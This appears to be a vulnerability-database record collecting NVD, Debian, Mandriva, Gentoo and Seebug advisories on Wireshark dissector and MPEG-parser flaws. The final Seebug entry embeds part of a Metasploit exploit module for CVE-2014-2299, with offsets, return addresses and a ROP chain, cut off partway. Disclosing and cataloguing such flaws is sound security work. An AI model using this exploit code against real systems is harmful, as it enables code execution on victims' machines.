"bulletinFamily": "NVD", "description": "epan/dissectors/packet-rlc in the RLC dissector in Wireshark 1.8.x before 1.8.13 and 1.10.x before 1.10.6 uses inconsistent memory-management approaches, which allows remote attackers to cause a denial of service (use-after-free error and application crash) via a crafted UMTS Radio Link Control packet.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "modified": "2015-08-12T17:44:00", "id": "CVE-2014-2283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2283", "published": "2014-03-11T13:01:00", "title": "CVE-2014-2283", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2792-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nNovember 04, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : wireshark\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2013-6336 CVE-2013-6337 CVE-2013-6338 CVE-2013-6340\r\n\r\nMultiple vulnerabilities were discovered in the dissectors for IEEE\r\n802.15.4, NBAP, SIP and TCP, which could result in denial of service.\r\n\r\nThe oldstable distribution &#40;squeeze&#41; is only affected by CVE-2013-6340.\r\nThis problem has been fixed in version 1.2.11-6+squeeze13.\r\n\r\nFor the stable distribution &#40;wheezy&#41;, these problems have been fixed in\r\nversion 1.8.2-5wheezy7.\r\n\r\nFor the unstable distribution &#40;sid&#41;, these problems have been fixed in\r\nversion 1.10.3-1.\r\n\r\nWe recommend that you upgrade your wireshark packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.15 &#40;GNU/Linux&#41;\r\n\r\niQIcBAEBCgAGBQJSd94bAAoJEAVMuPMTQ89EefwQAJZxpySsNYON/X7CqHGnMOmj\r\nyTVTRKB6//C0TLVuLMbrLi1rtcjPMVkdsiZtdc5BYZNOTy8hMcoXL2wIA7W5JL7/\r\nZLrbfFSrdkzLPHXxs2icMJQxoM4+tJxvVp5MrFWQYswIlHCC/4XhtUqIggimAOAX\r\nivxpeYe5Kfex5AGROFXi/I0e/C3hRW0ClEuIzQxba86KswjrhvAmPfoyVoWWffQq\r\n3EX7/mFwXi6QQtvCY08z1QRFFNyIYhkG1M6dAj2gze5/7cofHzQY1UIgSUUDP28X\r\nF0YA9rj2tECyvJzkqTeiSFCv2/G3E+OGO6LOBG6rYTwJs1nFF0xIdwXbnpO7GDgY\r\nrv6gtsu//7oaaS2PRVON0sHUJUgVnwEfi8cZWCFy40ZhF4jtp93DR5RH2PNlwZOC\r\nWkIrrPELxlS7kWOvxjmVlZfAjhQscObumHuRTcEJY0mxNHufLKU0d+K5jvIvijpB\r\nG2jJ8QOAvoV2HgIDbCKWvkkb9PIx+1mp7KGDrzr6BvTuxxxbjwRgM5WjNSLaYLUn\r\nk8e/8Vy+joo1Jnj8sKSkkcglRqEh+tjpIcLoSLDo8WDpc7ZDR7Kn4CHBjDuWSDdk\r\nxHRw8nUAuYPgrjkr/4iKJgcavoMGpETEewYVaKUUbzQwQ5H/Lup2MU6eAVgpXYbN\r\n/+XONLaI4kCuVk04fJBd\r\n=DYub\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:DOC:30015", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30015", "title": "[SECURITY] [DSA 2792-1] wireshark security update", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "description": "DoS in NFS and RLC dissectors, buffer overflow on MPEG parsing.", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "id": "SECURITYVULNS:VULN:13602", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13602", "title": "Wireshark multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:050\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : wireshark\r\n Date : March 10, 2014\r\n Affected: Business Server 1.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was found and corrected in Wireshark:\r\n \r\n * The NFS dissector could crash. Discovered by Moshe Kaplan\r\n &#40;CVE-2014-2281&#41;.\r\n \r\n * The RLC dissector could crash &#40;CVE-2014-2283&#41;.\r\n \r\n * The MPEG file parser could overflow a buffer. Discovered by Wesley\r\n Neelen &#40;CVE-2014-2299&#41;.\r\n \r\n This advisory provides the latest version of Wireshark &#40;1.8.13&#41;\r\n which is not vulnerable to these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2281\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2283\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2299\r\n http://www.wireshark.org/security/wnpa-sec-2014-01.html\r\n http://www.wireshark.org/security/wnpa-sec-2014-03.html\r\n http://www.wireshark.org/security/wnpa-sec-2014-04.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n 4f641d05af87e5a053edd599e23975c7 mes5/i586/dumpcap-1.8.13-0.1mdvmes5.2.i586.rpm\r\n b1a8a82298dd88bde7f9e41b1a73b47d mes5/i586/libwireshark2-1.8.13-0.1mdvmes5.2.i586.rpm\r\n 896c658c6ddacc562a0d70366c64aefd mes5/i586/libwireshark-devel-1.8.13-0.1mdvmes5.2.i586.rpm\r\n b3287396b309bd0ec077ec03647356ac mes5/i586/rawshark-1.8.13-0.1mdvmes5.2.i586.rpm\r\n b05f181a687aee422bcc9d2a0dbedecc mes5/i586/tshark-1.8.13-0.1mdvmes5.2.i586.rpm\r\n a3c609066ee5c522f735160b791b3d1d mes5/i586/wireshark-1.8.13-0.1mdvmes5.2.i586.rpm\r\n 8e3d5cddff1cf5b3de28e6fd6298a412 mes5/i586/wireshark-tools-1.8.13-0.1mdvmes5.2.i586.rpm \r\n 104a5965c230eba36b23945ea4d378e6 mes5/SRPMS/wireshark-1.8.13-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n bf3e734f58c22f4a7d4cb9a92c723e6b mes5/x86_64/dumpcap-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n f3f2f97f4a0dab273fe6821f9b3dcda2 mes5/x86_64/lib64wireshark2-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n d7182aa64192b2b4856ce1deb25da35d mes5/x86_64/lib64wireshark-devel-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n ce9a49108e3e37385b1ecd1aec0818b5 mes5/x86_64/rawshark-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n 345d1066d8dda18a06b0f9b0f34b12ff mes5/x86_64/tshark-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n 49cf7c4dbec20d065ff535f5bc500d3b mes5/x86_64/wireshark-1.8.13-0.1mdvmes5.2.x86_64.rpm\r\n 79c290d0a6934440a3989e696f6e3a2d mes5/x86_64/wireshark-tools-1.8.13-0.1mdvmes5.2.x86_64.rpm \r\n 104a5965c230eba36b23945ea4d378e6 mes5/SRPMS/wireshark-1.8.13-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 919616ad2d26713c2d0a4148d06cc671 mbs1/x86_64/dumpcap-1.8.13-1.mbs1.x86_64.rpm\r\n 32bc98bd5e9d2e19043d77ba944413fb mbs1/x86_64/lib64wireshark2-1.8.13-1.mbs1.x86_64.rpm\r\n e966a54884894738c89859f3768aed5c mbs1/x86_64/lib64wireshark-devel-1.8.13-1.mbs1.x86_64.rpm\r\n b96bbb6c34d1bf867e7409392b82817a mbs1/x86_64/rawshark-1.8.13-1.mbs1.x86_64.rpm\r\n a803b639bdf2ffa9d905bae772d19498 mbs1/x86_64/tshark-1.8.13-1.mbs1.x86_64.rpm\r\n ba694e53492db08cb4db43ae181b519f mbs1/x86_64/wireshark-1.8.13-1.mbs1.x86_64.rpm\r\n c24508e134fd8be7216f4a165dc3f71c mbs1/x86_64/wireshark-tools-1.8.13-1.mbs1.x86_64.rpm \r\n bc9586d2a42a3b7f52a02843905c7f59 mbs1/SRPMS/wireshark-1.8.13-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFTHcXMmqjQ0CJFipgRApA3AJ9dlqu6qQiutinpvBDtprtQHoIKIQCeM396\r\n03x4Ft2ynLHpeO4UFnID4QM=\r\n=F8Lb\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2014-03-13T00:00:00", "published": "2014-03-13T00:00:00", "id": "SECURITYVULNS:DOC:30359", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30359", "title": "[ MDVSA-2014:050 ] wireshark", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Vulnerabilities in different protocols dissectors.", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:VULN:13309", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13309", "title": "wireshark multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Problems with NTLMSSPv2 and BSSGP dissectors.", "modified": "2013-12-24T00:00:00", "published": "2013-12-24T00:00:00", "id": "SECURITYVULNS:VULN:13466", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13466", "title": "Wireshark DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2825-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nDecember 20, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : wireshark\r\nVulnerability : several\r\nProblem type : local&#40;remote&#41;\r\nDebian-specific: no\r\nCVE ID : CVE-2013-7113 CVE-2013-7114\r\n\r\nLaurent Butti and Garming Sam discored multiple vulnerabilities in the\r\ndissectors for NTLMSSPv2 and BSSGP, which could lead to denial of service\r\nor the execution of arbitrary code.\r\n\r\nFor the stable distribution &#40;wheezy&#41;, these problems have been fixed in\r\nversion 1.8.2-5wheezy9.\r\n\r\nFor the unstable distribution &#40;sid&#41;, these problems have been fixed in\r\nversion 1.10.4-1.\r\n\r\nWe recommend that you upgrade your wireshark packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.15 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlK0XgcACgkQXm3vHE4uylrKjgCfVTOT8kARewE6iV6onlA/gfls\r\n9qkAoLuMZRHe52ZLhignrtWWzF5R7X/F\r\n=nXRp\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-12-24T00:00:00", "published": "2013-12-24T00:00:00", "id": "SECURITYVULNS:DOC:30134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30134", "title": "[SECURITY] [DSA 2825-1] wireshark security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:20", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2792-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nNovember 04, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wireshark\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-6336 CVE-2013-6337 CVE-2013-6338 CVE-2013-6340\n\nMultiple vulnerabilities were discovered in the dissectors for IEEE\n802.15.4, NBAP, SIP and TCP, which could result in denial of service.\n\nThe oldstable distribution (squeeze) is only affected by CVE-2013-6340.\nThis problem has been fixed in version 1.2.11-6+squeeze13.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.10.3-1.\n\nWe recommend that you upgrade your wireshark packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-11-04T17:50:53", "published": "2013-11-04T17:50:53", "id": "DEBIAN:DSA-2792-1:C62D2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00204.html", "title": "[SECURITY] [DSA 2792-1] wireshark security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:21:53", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2871-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 10, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wireshark\nCVE ID : CVE-2014-2281 CVE-2014-2283 CVE-2014-2299\n\nMultiple vulnerabilities were discovered in Wireshark:\n\nCVE-2014-2281\n\n Moshe Kaplan discovered that the NFS dissector could be crashed,\n resulting in denial of service.\n\nCVE-2014-2283\n\n It was discovered that the RLC dissector could be crashed, resulting \n in denial of service.\n\nCVE-2014-2299\n\n Wesley Neelen discovered a buffer overflow in the MPEG file parser,\n which could lead to the execution of arbitrary code.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.2.11-6+squeeze14.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy10.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.10.6-1.\n\nWe recommend that you upgrade your wireshark packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n\n\n", "modified": "2014-03-10T14:55:52", "published": "2014-03-10T14:55:52", "id": "DEBIAN:DSA-2871-1:4BB93", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00042.html", "title": "[SECURITY] [DSA 2871-1] wireshark security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:38", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2825-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nDecember 20, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : wireshark\nVulnerability : several\nProblem type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2013-7113 CVE-2013-7114\n\nLaurent Butti and Garming Sam discored multiple vulnerabilities in the\ndissectors for NTLMSSPv2 and BSSGP, which could lead to denial of service\nor the execution of arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy9.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.10.4-1.\n\nWe recommend that you upgrade your wireshark packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-12-20T15:14:18", "published": "2013-12-20T15:14:18", "id": "DEBIAN:DSA-2825-1:6CAB0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00239.html", "title": "[SECURITY] [DSA 2825-1] wireshark security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:26", "bulletinFamily": "unix", "description": "### Background\n\nWireshark is a versatile network protocol analyzer.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Wireshark 1.10 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.10.3\"\n \n\nAll Wireshark 1.8 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.8.11\"", "modified": "2013-12-16T00:00:00", "published": "2013-12-16T00:00:00", "id": "GLSA-201312-13", "href": "https://security.gentoo.org/glsa/201312-13", "type": "gentoo", "title": "Wireshark: Multiple vulnerabilities", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:57", "bulletinFamily": "unix", "description": "### Background\n\nWireshark is a network protocol analyzer formerly known as ethereal.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can cause arbitrary code execution or a Denial of Service condition via a specially crafted packet. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Wireshark 1.8.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.8.15\"\n \n\nAll Wireshark 1.10.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.10.8\"", "modified": "2014-06-29T00:00:00", "published": "2014-06-29T00:00:00", "id": "GLSA-201406-33", "href": "https://security.gentoo.org/glsa/201406-33", "type": "gentoo", "title": "Wireshark: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:30:51", "bulletinFamily": "exploit", "description": "Bugtraq ID\uff1a66066\r\nCVE ID\uff1aCVE-2014-2299\r\n\r\nWireshark\uff08\u524d\u79f0Ethereal\uff09\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90\u7f51\u7edc\u6d41\u91cf\u5206\u6790\u8f6f\u4ef6\u3002\r\n\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u662f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\uff0c\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nMandrakeSoft Enterprise Server 5 x86_64\r\nMandrakeSoft Enterprise Server 5\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\nhttp://www.wireshark.org/", "modified": "2014-03-21T00:00:00", "published": "2014-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61893", "id": "SSV:61893", "title": "Wireshark MPEG File Parser 'wiretap/mpeg.c'\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:07", "bulletinFamily": "exploit", "description": "Bugtraq ID\uff1a66068\r\nCVE ID\uff1aCVE-2014-2281\r\n\r\nWireshark\uff08\u524d\u79f0Ethereal\uff09\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90\u7f51\u7edc\u6d41\u91cf\u5206\u6790\u8f6f\u4ef6\u3002\r\n\r\n\u7531\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u5904\u7406\u67d0\u4e9b\u7c7b\u578b\u7684\u6570\u636e\u5305\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u662f\u53d7\u5f71\u54cd\u7a0b\u5e8f\u5d29\u6e83\uff0c\u62d2\u7edd\u670d\u52a1\u5408\u6cd5\u7528\u6237\u3002\n0\nMandrakeSoft Enterprise Server 5 x86_64\r\nMandrakeSoft Enterprise Server 5\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\nhttp://www.wireshark.org/", "modified": "2014-03-21T00:00:00", "published": "2014-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61892", "id": "SSV:61892", "title": "Wireshark NFS Dissector\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:09", "bulletinFamily": "exploit", "description": "Bugtraq ID\uff1a66072\r\nCVE ID\uff1aCVE-2014-2283\r\n\r\nWireshark\uff08\u524d\u79f0Ethereal\uff09\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90\u7f51\u7edc\u6d41\u91cf\u5206\u6790\u8f6f\u4ef6\u3002\r\n\r\n\u7531\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u5904\u7406\u67d0\u4e9b\u7c7b\u578b\u7684\u6570\u636e\u5305\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u662f\u53d7\u5f71\u54cd\u7a0b\u5e8f\u5d29\u6e83\u3002\n0\nMandrakeSoft Enterprise Server 5 x86_64\r\nMandrakeSoft Enterprise Server 5\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\nhttp://www.wireshark.org/", "modified": "2014-03-21T00:00:00", "published": "2014-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61890", "id": "SSV:61890", "title": "Wireshark RLC Dissector 'packet-rlc.c'\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:09:43", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86324", "id": "SSV:86324", "title": "Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow", "type": "seebug", "sourceData": "\n # Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer\r\nOverflow\r\n# Date: 24/04/2014\r\n# Exploit Author: j0sm1\r\n# Vendor Homepage: www.wireshark.org\r\n# Software Link: http://wireshark.askapache.com/download/win32/all-versions/\r\n# Version: &#60; 1.8.12/1.10.5\r\n# Tested on: Windows XP SP3\r\n# CVE : cve-2014-2299\r\n\r\n# Metasploit URL module:\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb\r\n\r\n#\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n &#39;Name&#39; =&#62; &#39;Wireshark &#60;= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow&#39;,\r\n &#39;Description&#39; =&#62; %q{\r\n This module triggers a stack buffer overflow in Wireshark &#60;= 1.8.12/1.10.5\r\n by generating an malicious file.)\r\n },\r\n &#39;License&#39; =&#62; MSF_LICENSE,\r\n &#39;Author&#39; =&#62;\r\n [\r\n\t &#39;Wesley Neelen&#39;, # Discovery vulnerability\r\n &#39;j0sm1&#39;, # Exploit and msf module\r\n ],\r\n &#39;References&#39; =&#62;\r\n [\r\n [ &#39;CVE&#39;, &#39;2014-2299&#39;],\r\n [ &#39;URL&#39;, &#39;https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843&#39; ],\r\n [ &#39;URL&#39;, &#39;http://www.wireshark.org/security/wnpa-sec-2014-04.html&#39; ],\r\n [ &#39;URL&#39;, &#39;http://www.securityfocus.com/bid/66066/info&#39; ]\r\n ],\r\n &#39;DefaultOptions&#39; =&#62;\r\n {\r\n &#39;EXITFUNC&#39; =&#62; &#39;process&#39;,\r\n },\r\n &#39;Payload&#39; =&#62;\r\n {\r\n &#39;BadChars&#39; =&#62; &#34;\\xff&#34;,\r\n &#39;Space&#39; =&#62; 600,\r\n &#39;DisableNops&#39; =&#62; &#39;True&#39;,\r\n &#39;PrependEncoder&#39; =&#62; &#34;\\x81\\xec\\xc8\\x00\\x00\\x00&#34; # sub esp,200 \r\n },\r\n &#39;Platform&#39; =&#62; &#39;win&#39;,\r\n &#39;Targets&#39; =&#62;\r\n [\r\n [ &#39;WinXP SP3 Spanish (bypass DEP)&#39;,\r\n {\r\n &#39;OffSet&#39; =&#62; 69732,\r\n &#39;OffSet2&#39; =&#62; 70476,\r\n &#39;Ret&#39; =&#62; 0x1c077cc3, # pop/pop/ret -&#62; &#34;c:\\Program Files\\Wireshark\\krb5_32.dll&#34; (version: 1.6.3.16) \r\n &#39;jmpesp&#39; =&#62; 0x68e2bfb9,\r\n }\r\n ],\r\n\t [ &#39;WinXP SP2/SP3 English (bypass DEP)&#39;,\r\n {\r\n &#39;OffSet2&#39; =&#62; 70692,\r\n &#39;OffSet&#39; =&#62; 70476,\r\n &#39;Ret&#39; =&#62; 0x1c077cc3, # pop/pop/ret -&#62; krb5_32.dll module\r\n &#39;jmpesp&#39; =&#62; 0x68e2bfb9,\r\n }\r\n ],\r\n ],\r\n &#39;Privileged&#39; =&#62; false,\r\n &#39;DisclosureDate&#39; =&#62; &#39;Mar 20 2014&#39;\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new(&#39;FILENAME&#39;, [ true, &#39;pcap file&#39;, &#39;mpeg_overflow.pcap&#39;]),\r\n ], self.class)\r\n end\r\n\r\n def create_rop_chain()\r\n\r\n # rop chain generated with mona.py - www.corelan.be\r\n rop_gadgets = \r\n [\r\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\r\n 0x62d9027c, # ptr to 